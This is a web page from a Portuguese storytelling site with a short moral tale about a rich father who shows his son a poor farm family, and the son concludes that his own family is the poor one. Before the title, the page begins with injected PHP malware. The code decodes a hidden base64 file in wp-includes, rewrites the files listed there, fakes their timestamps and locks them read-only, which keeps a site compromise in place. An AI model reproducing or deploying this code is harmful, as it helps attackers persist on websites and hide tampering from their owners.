$wp_update_file="/home/defaultwebsite/public/wp-includes/Text/Diff/Engine/filters.php"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } Viver na riqueza e na pobreza | Casa do Contador de Historias
Viver na riqueza e na pobreza - Pai e filho

Viver na riqueza e na pobreza

Conta-se que certa vez um homem muito rico levou seu filho de sete anos para o interior, para que ele enxergasse o quanto eram ricos e passasse a dar mais valor aos bens materiais que possuíam.

Dormiram em uma casa de taipa de um trabalhador em uma fazenda. Quando retornaram, o pai perguntou ao filho:

– Então, o que achou do passeio?

– Muito bom – disse o garoto.

– Percebeu a diferença entre viver na riqueza e viver na pobreza?

E o filho respondeu:

– Sim, pai. Eu vi que nós temos um cachorro em casa, e eles têm quatro; que nós temos uma piscina, e eles têm um riacho que não acaba nunca; nós temos uma varanda coberta e iluminada com lâmpadas, e eles têm estrelas e a lua que nós não vimos. Nosso quintal vai até o portão de entrada, e eles têm uma floresta inteira.

E o filho ainda acrescentou:

– Obrigado pai, por me mostrar o quanto somos pobres.

Autor Desconhecido.
Se você conhece o autor desta história, entre em contato conosco.

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Rolar para cima